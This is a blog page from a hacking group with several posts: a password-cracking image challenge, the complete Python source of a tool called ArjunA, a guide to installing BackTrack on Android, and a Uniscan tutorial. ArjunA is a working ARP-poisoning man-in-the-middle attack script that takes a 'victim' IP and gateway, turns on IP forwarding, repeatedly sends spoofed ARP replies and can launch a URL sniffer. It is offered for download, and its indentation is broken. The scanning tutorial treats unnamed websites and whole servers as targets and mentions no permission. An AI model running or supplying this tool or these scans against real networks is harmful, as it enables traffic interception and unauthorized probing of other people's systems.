CHALLENGE - CRACK THE IMAGE


CRACK PASS FROM THE IMAGE


               Hello friends it took long time to crack previous challenge for members. And so far only one member cracked it correctly. So we planned to make this challenge a bit easier compared to the previous one.

Note: Also comment to your FB or mail id along with answer . And try to upload your image and give us the link so that we can publish, Which helps others to identify u.



2 comments:

ARJUNA - MAN IN THE MIDDLE ATTACK TOOL

ARJUNA - ARP POISONING TOOL  
Power Of BOW and ---->




              This tool s completely developed by "Chennai Hackers Connect" Team. It is a lightweight and flexible tool with an interactive mode which is written in python.The next tool of CHC them will have inbuilt DNS spoofing and SSL Strip. 


FEATURES:

1. ARP SPOOFING
2. AUTOMATIC IP FORWARDING 
3. HALF AND FULL ROUTING


ArjunA Source Code :
#!/usr/bin/python

import subprocess

ban="""                                                 
\t                       =TARGET= 
\t                         .`.                           
\t                       .`.::`.                           
\t                      ```.,.```                     
\t               `,:::'',:::;';:'+;:::.`                 
\t             `:.          `,:        :,`               
\t           .,              `.:         `.,             
\t       `,.`                 ,,.          `.,`          
\t           `            .++ ,.;         .             
\t             ``        `'.,':,:      ``               
\t                ``     ;+',++:.    ``                  
\t                   .` :+;.''+;` ``                    
\t                      ;'+,:;#;`                       
\t                     `` `;::,                         
\t      ArjunA        `:. `..::`         Power Of BOW and ---->                    
\t                     ,.. ..;: `                       
\t                     ,,;,.;..`.                       
\t                     .,,.,. :`,                       
\t                     `,.,:``.,:                       
\t For Hackers          ..;.```;,    ==>Chennai Hackers Connect<==                  
\t  By Hackers          ,.,::,;;:                       
\t                      `., ``.,:.                      
\t                    ..,,,  `.,  `                     
\t                  `.,,,,;  `,.   . `.::;;+++',        
\t             `  ``...,:;` `.,,   `;+######+;`         
\t            ````...,,,:, `...;.`  ,####+;.`           
\t         `.,;'````.`.'#``...;':`` `'##+,              
\t        `,;,`,;+';::,,::;::;';:,``,+#+`               
\t      .::,.`    .,:'+++''''';;;;;:;;:,`               
\t        http://chennaihackers.blogspot.com
"""

subprocess.call('clear', shell=True)
print(ban)


import sys
import os
import time
import logging
from time import sleep
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *


def ddr_protocol():
if len(ban)!=1758:
print("DDR protocol Enabled .You altered the program, So it wont work\n")
sys.exit()

def usage():
print("\n"+"-"*76)
print("./ArjunA.py -interface UserName (or) ./ArjunA.py -interfcae (or) ./ArjunA.py")
print("-"*76)



help = ["-h" , "--help"]


if (len(sys.argv)) >= 2 :
cmdhelp=sys.argv[1]
if cmdhelp in help :
usage()
sys.exit(1)



if (len(sys.argv)) >= 3:
user = sys.argv[2]
print("Hi " +user+ "....")

else: user="User"



ddr_protocol()



def urlsniff():
sniff=os.system("gnome-terminal -e 'bash -c \"urlsnarf; exec bash\"'")


def ipfor_en():
forward=os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
print("\n"+'\033[94m'+"IP forwarding Enabled"+'\033[0m'+"\n")

def ipfor_dis():
forward=os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
print("\n"+'\033[94m'+"IP forwarding Disabled"+'\033[0m'+"\n")




victim = raw_input("Enter victims IP : ")
target = raw_input("Enter Gateway IP : ")
#url = str(input("Do you need url sniffer : "))
url = raw_input("Do you need url sniffer : ")



if (len(sys.argv)) >= 2:
face=sys.argv[1]
interface=face.lstrip("-")
else:interface=raw_input("Enter the interface : ")



urlyes = ["yes", "y", "YES",  "Y"]
urlno = [ "no", "NO", "n", "N"]


if url in urlyes :
urlsniff()
print("\n"+"\x1b[01;36m"+"Sniffer Activated"+'\033[0m'+"\n")

if url in urlno :
print("\n"+'\033[91m'+"Sniffer Not Activated" + '\033[0m' +"\n")



for i in range(26):
sys.stdout.write('\r')
        # the exact output you're looking for:
sys.stdout.write("[%-26s]%d%%" % ('='*i+'>', 4*i))
sys.stdout.flush()
sleep(0.18)

sys.stdout.write("\n")


ip = IP(dst=victim)
icmp = ICMP()
send(ip/icmp, verbose=0, iface=interface)


a = ARP(op=2, psrc=target, pdst=victim)
b = ARP(op=2, psrc=victim, pdst=target)

#a.show()
#b.show()


print("\nAttack in progress press 'ctrl+c' to stop and exit\n")

ipfor_en()

count=0
while 1:
count += 1
try:
at = send(a, verbose=0, iface=interface)
if count == 1 :
print("\x1b[01;32m"+"Half Routing sucessfull !"+ '\033[0m')
       bt = send(b, verbose=0, iface=interface)
if count == 1 :
print("\x1b[01;32m"+"Full Routing sucessfull !!"+ '\033[0m')
time.sleep(60)

except KeyboardInterrupt:
print("\r\n=====> Attack Stopped by " +user+" <=====")
ipfor_dis()
       sys.stdin.close()
       sys.exit()



You can also download tool in python extension.


Download here

0 comments:

Installing Backtrack In An Android Device

Related Posts Plugin for WordPress, Blogger...
Install Backtrack In Tablets




We going to show you the easiest way to install backtrack on an android device. For this tutorial you need:
  • Rooted android device
  • Linux installer (Can be found on Google play)
  • Zarchiver (Can be found on Google play)
  • Busybox (Can be found on Google play)
  • Android-VNC (Can be found on Google play)
  • Terminal  Emulator (Can be found on Google play)

All of the programs mentioned above are free.
Ok, now let's start, The first thing you need to do is install Busybox from Google play: Install it, then open it when it's done, it will install some more things. When it's done, install Linux Installer from Google Play:

Open Linux installer, then click on Install Guides from the list on your right hand side:

When you click that, you'll see a list of Linux distros, click on Backtrack and you will see a screen with steps on how to install it. Now click on the second page of those steps, you will get a page that looks like this: Just click on "Download Image", and let it finish downloading. While it's downloading, open Google play and install Terminal Emulator, and Zarchiver.

Terminal Emulator:

Zarchiver:

When it finishes downloading, open Zarchiver, and look for the ZIP file that you downloaded, and extraxt the image into a root folder called "backtrack", extract the image into an external memory card not the internal one. Once it's done, open Linux Installer again, and click on launch, you'll get a screen that looks like this:

If it didn't recognize any distro, click on Setting > Edit then change the file path there to your backtrack image, the .img file that you extracted. When it finally say "backtrack" on the drop down list, click "Start Linux"  Terminal Emulator will open, you just have to proceed with the installation steps, ask you for a new password, and some preferences. When it's done you will get a red "root@localhost~#" like the picture bellow: You are now in backtrack! Now if you want backtrack in GUI, open Google play, and install Android VNC:

Open It when it finishes installing, and it will look like this:

Set to the same settings in the picture, but not the IP address, you can get your IP by opening backtrack terminal, in terminal emulator, and running "ifconfig" command: Settings for VNC are, Username: backtrack Password: backtrack IP: from the "ifconfig" command or just put 127.0.0.1  Color Format: 24-bit Now click connect, and boom! You'r in backtrack Desktop! ;)

When you finish using it, remember to disconnect VNC  AND exit backtrack in Terminal Emulator, else it will be taking your battery in the background. And note that Ubuntu can be installed in the same exact way, just the username and password for VNC will change.


0 comments:

Website Vulnerability Scanning Using BackTrack



Scan Website For Vulnerabilities Using BackTrack - Uniscan
Hello CHC members we gonna scan for vulnerabilities in a website, or all the websites in the server.
In this tutorial I will use a program in BackTrack called UniScan. it's very easy to use, but very good in scanning.
First of all, open your terminal and type this command: cd /pentest/web/uniscan && ./uniscan.pl

Something like this will be printed on your terminal. Now all we have to do is follow the instructions. First of all we need a target to scan, I've chose one already and I will use it in my pictures. To start the scan, first you have to check the options which you want to use in your scan.

# HOW TO USE OPTIONS: Check the letter beside your option, and include it after the URL like this: 
./uniscan.pl -u http://www.website.com/ -b -q -d -w or put them all together. 
./uniscan.pl -u http://www.website.com/ -bqdw .This will start your scan with all the different options you included.
NOTE:- NEVER FORGET THE FORWARD SLASH AT THE END OF THE LINK IN THE END!!


Now the scan will start, and the terminal will look something like this:



This scan will scan for vulnerabilities like SQL-i / LFI / RFI and so on. It also searches for Webshells, backdoors, PHP info disclosure, Emails, and much more.

Here are some examples:
PHP.info() disclosure:


External Links/Hosts:


Source Code disclosure:


Dynamic Scan, Vulnerability Identification:
This program can also get all the sites in a server, and then you will be able to scan all of them. To do that, run this command:
./uniscan.pl -i "ip:127.0.0.1"

Change 127.0.0.1 to your target server. All the websites will be stored in "sites.txt" in the same directory.
Now to scan those sites in the list, run this command:
./uniscan.pl -f sites.txt -bqwd
You can change the options to whatever you want.

5 comments: